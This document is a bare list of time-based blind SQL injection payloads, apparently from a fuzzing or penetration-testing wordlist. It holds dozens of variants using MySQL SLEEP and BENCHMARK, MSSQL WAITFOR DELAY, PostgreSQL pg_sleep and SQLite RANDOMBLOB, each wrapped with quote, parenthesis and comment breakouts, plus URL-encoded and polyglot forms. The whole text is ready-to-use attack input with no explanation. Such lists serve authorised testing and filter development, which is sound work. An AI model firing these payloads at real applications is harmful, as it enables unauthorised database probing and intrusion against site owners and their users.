,(select * from (select(sleep(0.5)))a)
%2c(select%20*%20from%20(select(sleep(0.5)))a)
';WAITFOR DELAY '0:0:05'--
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1))
SLEEP(0.5))/*'XOR(IF(SUBSTR(@@version,1,1)<5
BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(0.5)))OR'|'XOR(IF(SUBSTR(@@version,1,1)<5
BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(0.5)))OR'*
sleep(0.5)#
1 or sleep(0.5)#
" or sleep(0.5)#
' or sleep(0.5)#
" or sleep(0.5)="
' or sleep(0.5)='
1) or sleep(0.5)#
") or sleep(0.5)="
') or sleep(0.5)='
1)) or sleep(0.5)#
")) or sleep(0.5)="
')) or sleep(0.5)='
;waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
benchmark(5000000,MD5(1))#
1 or benchmark(5000000,MD5(1))#
" or benchmark(5000000,MD5(1))#
' or benchmark(5000000,MD5(1))#
1) or benchmark(5000000,MD5(1))#
") or benchmark(5000000,MD5(1))#
') or benchmark(5000000,MD5(1))#
1)) or benchmark(5000000,MD5(1))#
")) or benchmark(5000000,MD5(1))#
')) or benchmark(5000000,MD5(1))#
pg_sleep(5)--
1 or pg_sleep(0.5)--
" or pg_sleep(0.5)--
' or pg_sleep(0.5)--
1) or pg_sleep(0.5)--
") or pg_sleep(0.5)--
') or pg_sleep(0.5)--
1)) or pg_sleep(0.5)--
")) or pg_sleep(0.5)--
')) or pg_sleep(0.5)--
AND (SELECT * FROM (SELECT(SLEEP(0.5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(0.5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(0.5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(0.5)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(0.5)))nQIP)#
SLEEP(0.5)#
SLEEP(0.5)--
SLEEP(0.5)="
SLEEP(0.5)='
or SLEEP(0.5)
or SLEEP(0.5)#
or SLEEP(0.5)--
or SLEEP(0.5)="
or SLEEP(0.5)='
waitfor delay '00:00:05'
waitfor delay '00:00:05'--
waitfor delay '00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
or benchmark(50000000,MD5(1))
or benchmark(50000000,MD5(1))--
or benchmark(50000000,MD5(1))#
pg_SLEEP(0.5)
pg_SLEEP(0.5)--
pg_SLEEP(0.5)#
or pg_SLEEP(0.5)
or pg_SLEEP(0.5)--
or pg_SLEEP(0.5)#
'\"
AnD SLEEP(0.5)
AnD SLEEP(0.5)--
AnD SLEEP(0.5)#
&&SLEEP(0.5)
&&SLEEP(0.5)--
&&SLEEP(0.5)#
' AnD SLEEP(0.5) ANd '1
'&&SLEEP(0.5)&&'1
ORDER BY SLEEP(0.5)
ORDER BY SLEEP(0.5)--
ORDER BY SLEEP(0.5)#
(SELECT * FROM (SELECT(SLEEP(0.5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(0.5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(0.5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+ SLEEP(0.5) + '
RANDOMBLOB(500000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(5000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(5000000000/2))))
SLEEP(0.5)/*' or SLEEP(0.5) or '" or SLEEP(0.5) or "*/
